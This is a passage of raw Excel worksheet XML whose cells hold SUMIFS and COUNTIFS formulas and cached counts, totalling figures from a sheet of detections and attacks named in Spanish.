      </c>
      <c r="U10" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U8 &amp; "*") </f>
        <v>574</v>
      </c>
      <c r="W10" s="352" t="s">
        <v>2464</v>
      </c>
      <c r="X10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X8)</f>
        <v>9384</v>
      </c>
      <c r="Y10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y8)</f>
        <v>1</v>
      </c>
      <c r="Z10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z8)</f>
        <v>2</v>
      </c>
      <c r="AA10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA8)</f>
        <v>1</v>
      </c>
      <c r="AB10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB8)</f>
        <v>6951</v>
      </c>
      <c r="AC10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC8)</f>
        <v>0</v>
      </c>
      <c r="AD10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD8)</f>
        <v>0</v>
      </c>
      <c r="AE10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE8)</f>
        <v>0</v>
      </c>
      <c r="AF10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF8)</f>
        <v>114</v>
      </c>
      <c r="AG10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG8)</f>
        <v>4</v>
      </c>
      <c r="AH10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH8)</f>
        <v>0</v>
      </c>
      <c r="AI10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI8)</f>
        <v>1</v>
      </c>
      <c r="AJ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ8)</f>
        <v>2</v>
      </c>
      <c r="AK10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK8)</f>
        <v>3</v>
      </c>
      <c r="AL10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL8)</f>
        <v>0</v>
      </c>
      <c r="AM10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM8)</f>
        <v>9</v>
      </c>
      <c r="AN10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN8)</f>
        <v>0</v>
      </c>
      <c r="AO10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO8)</f>
        <v>2</v>
      </c>
      <c r="AP10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP8)</f>
        <v>1</v>
      </c>
      <c r="AQ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ8)</f>
        <v>0</v>
      </c>
      <c r="AR10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR8)</f>
        <v>3</v>
      </c>
      <c r="AS10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS8)</f>
        <v>0</v>
      </c>
      <c r="AT10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT8)</f>
        <v>1</v>
      </c>
      <c r="AU10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU8)</f>
        <v>2</v>
      </c>
      <c r="AV10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV8)</f>
        <v>1</v>
      </c>
      <c r="AW10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW8)</f>
        <v>1</v>
      </c>
      <c r="AX10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX8)</f>
        <v>1</v>
      </c>
      <c r="AY10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY8)</f>
        <v>1</v>
      </c>
      <c r="AZ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ8)</f>
        <v>3</v>
      </c>
      <c r="BA10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA8)</f>
        <v>1</v>
      </c>
      <c r="BB10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB8)</f>
        <v>3292</v>
      </c>
      <c r="BC10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC8)</f>
        <v>5180</v>
      </c>
      <c r="BD10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD8)</f>
        <v>0</v>
      </c>
      <c r="BE10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE8)</f>
        <v>0</v>
      </c>
      <c r="BF10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF8)</f>
        <v>10</v>
      </c>
      <c r="BG10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG8)</f>
        <v>0</v>
      </c>
      <c r="BH10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH8)</f>
        <v>2</v>
      </c>
      <c r="BI10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI8)</f>
        <v>1</v>
      </c>
      <c r="BJ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ8)</f>
        <v>0</v>
      </c>
      <c r="BK10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK8)</f>
        <v>1</v>
      </c>
      <c r="BL10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL8)</f>
        <v>1</v>
      </c>
      <c r="BM10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM8)</f>
        <v>0</v>
      </c>
      <c r="BN10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN8)</f>
        <v>2</v>
      </c>
      <c r="BO10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO8)</f>
        <v>123</v>
      </c>
      <c r="BP10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP8)</f>
        <v>0</v>
      </c>
      <c r="BQ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ8)</f>
        <v>1</v>
      </c>
      <c r="BR10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR8)</f>
        <v>1</v>
      </c>
      <c r="BS10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS8)</f>
        <v>1</v>
      </c>
      <c r="BT10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT8)</f>
        <v>0</v>
      </c>
      <c r="BU10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU8)</f>
        <v>1</v>
      </c>
      <c r="BV10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV8)</f>
        <v>1</v>
      </c>
      <c r="BW10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW8)</f>
        <v>1</v>
      </c>
      <c r="BX10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX8)</f>
        <v>1</v>
      </c>
      <c r="BY10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY8)</f>
        <v>1</v>
      </c>
      <c r="BZ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ8)</f>
        <v>1</v>
      </c>
      <c r="CA10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA8)</f>
        <v>0</v>
      </c>
      <c r="CB10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB8)</f>
        <v>5</v>
      </c>
      <c r="CC10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC8)</f>
        <v>1</v>
      </c>
      <c r="CD10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD8)</f>
        <v>3</v>
      </c>
      <c r="CE10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE8)</f>
        <v>2</v>
      </c>
      <c r="CF10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF8)</f>
        <v>1</v>
      </c>
      <c r="CG10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG8)</f>
        <v>0</v>
      </c>
      <c r="CH10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH8)</f>
        <v>65839</v>
      </c>
      <c r="CI10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI8)</f>
        <v>1002</v>
      </c>
      <c r="CJ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ8)</f>
        <v>0</v>
      </c>
      <c r="CK10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK8)</f>
        <v>1</v>
      </c>
      <c r="CL10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL8)</f>
        <v>0</v>
      </c>
      <c r="CM10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM8)</f>
        <v>1</v>
      </c>
      <c r="CN10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN8)</f>
        <v>2</v>
      </c>
      <c r="CO10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO8)</f>
        <v>0</v>
      </c>
      <c r="CP10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP8)</f>
        <v>0</v>
      </c>
      <c r="CQ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ8)</f>
        <v>0</v>
      </c>
      <c r="CR10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR8)</f>
        <v>0</v>
      </c>
      <c r="CS10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS8)</f>
        <v>2</v>
      </c>
      <c r="CT10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT8)</f>
        <v>1</v>
      </c>
      <c r="CU10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU8)</f>
        <v>1</v>
      </c>
      <c r="CV10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV8)</f>
        <v>0</v>
      </c>
      <c r="CW10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW8)</f>
        <v>450</v>
      </c>
      <c r="CX10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX8)</f>
        <v>112</v>
      </c>
      <c r="CY10" s="603">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY8)</f>
        <v>11</v>
      </c>
      <c r="CZ10" s="173"/>
      <c r="DA10" s="173"/>
      <c r="DB10" s="173"/>
      <c r="DC10" s="173"/>
      <c r="DD10" s="616" t="s">
        <v>2013</v>
      </c>
      <c r="DE10" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD10,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>1</v>
      </c>
      <c r="DF10" s="726">
        <v>1.0</v>
      </c>
      <c r="DG10" s="337">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="DH10" s="719">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="DI10" s="720">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="DJ10" s="719">
        <v>0.0</v>
      </c>
      <c r="DK10" s="20">
        <v>0.0</v>
      </c>
      <c r="DL10" s="20">
        <v>0.0</v>
      </c>
      <c r="DM10" s="20">
        <v>0.0</v>
      </c>
      <c r="DN10" s="336">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="DO10" s="336">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="DP10" s="721">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="DR10" s="610"/>
      <c r="DS10" s="610"/>
      <c r="DT10" s="619" t="s">
        <v>2013</v>
      </c>
      <c r="DU10" s="612">
        <f>DF10/1</f>
        <v>1</v>
      </c>
      <c r="DV10" s="173"/>
      <c r="DW10" s="619" t="s">
        <v>2013</v>
      </c>
      <c r="DX10" s="612">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="DY10" s="722">
        <v>1.0</v>
      </c>
      <c r="DZ10" s="722"/>
      <c r="EA10" s="722"/>
      <c r="EE10" s="727"/>
      <c r="EF10" s="69" t="str">
        <f>AVERAGEIFS(EL11:EL148,'(B) - Detecciones - Ataques'!AG3:AG139,"LV1",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG10" s="69" t="str">
        <f>AVERAGEIFS(EM11:EM148,'(B) - Detecciones - Ataques'!AG3:AG139,"LV1",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH10" s="69" t="str">
        <f>AVERAGEIFS(EL11:EL148,'(B) - Detecciones - Ataques'!AG3:AG139,"LV2",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI10" s="621" t="str">
        <f>AVERAGEIFS(EM11:EM148,'(B) - Detecciones - Ataques'!AG3:AG139,"LV2",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ10" s="621"/>
      <c r="EK10" s="621"/>
      <c r="EL10" s="403" t="s">
        <v>2657</v>
      </c>
      <c r="EM10" s="403" t="s">
        <v>2658</v>
      </c>
      <c r="EN10" s="403"/>
      <c r="EO10" s="403"/>
      <c r="EP10" s="713"/>
      <c r="EQ10" s="714"/>
      <c r="ER10" s="723" t="s">
        <v>2093</v>
      </c>
      <c r="ES10" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER10)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER10 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="ET10" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER10)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER10 &amp; "*")</f>
        <v>6</v>
      </c>
      <c r="EU10" s="728">
        <f t="shared" ref="EU10:EU12" si="8">ES10/ET10</f>
        <v>0.8333333333</v>
      </c>
      <c r="EV10" s="714"/>
      <c r="EW10" s="725"/>
      <c r="EX10" s="714"/>
      <c r="EY10" s="714"/>
      <c r="EZ10" s="20" t="s">
        <v>2659</v>
      </c>
      <c r="FA10" s="173">
        <f>SUM('(B) - Detecciones - Ataques'!IO3:IO139)</f>
        <v>16092</v>
      </c>
      <c r="FC10" s="173"/>
      <c r="FD10" s="173"/>
      <c r="FE10" s="173"/>
      <c r="FF10" s="173"/>
      <c r="FG10" s="173"/>
      <c r="FH10" s="173"/>
      <c r="FI10" s="173"/>
      <c r="FJ10" s="173"/>
      <c r="FK10" s="173"/>
      <c r="FL10" s="173"/>
      <c r="FM10" s="173"/>
      <c r="FN10" s="173"/>
      <c r="FO10" s="173"/>
      <c r="FP10" s="173"/>
      <c r="FQ10" s="20" t="s">
        <v>2457</v>
      </c>
      <c r="FR10" s="20" t="s">
        <v>2458</v>
      </c>
      <c r="FS10" s="20" t="s">
        <v>2459</v>
      </c>
      <c r="FT10" s="20" t="s">
        <v>2460</v>
      </c>
      <c r="FU10" s="20" t="s">
        <v>2660</v>
      </c>
    </row>
    <row r="11">
      <c r="D11" s="352" t="s">
        <v>2466</v>
      </c>
      <c r="E11" s="404" t="s">
        <v>2467</v>
      </c>
      <c r="F11" s="387"/>
      <c r="G11" s="505" t="s">
        <v>2661</v>
      </c>
      <c r="H11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,H8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; H8 &amp; "*") </f>
        <v>583</v>
      </c>
      <c r="I11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,I8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; I8 &amp; "*") </f>
        <v>6949</v>
      </c>
      <c r="J11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,J8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; J8 &amp; "*") </f>
        <v>117</v>
      </c>
      <c r="K11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,K8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; K8 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="L11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,L8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; L8 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="M11" s="624">
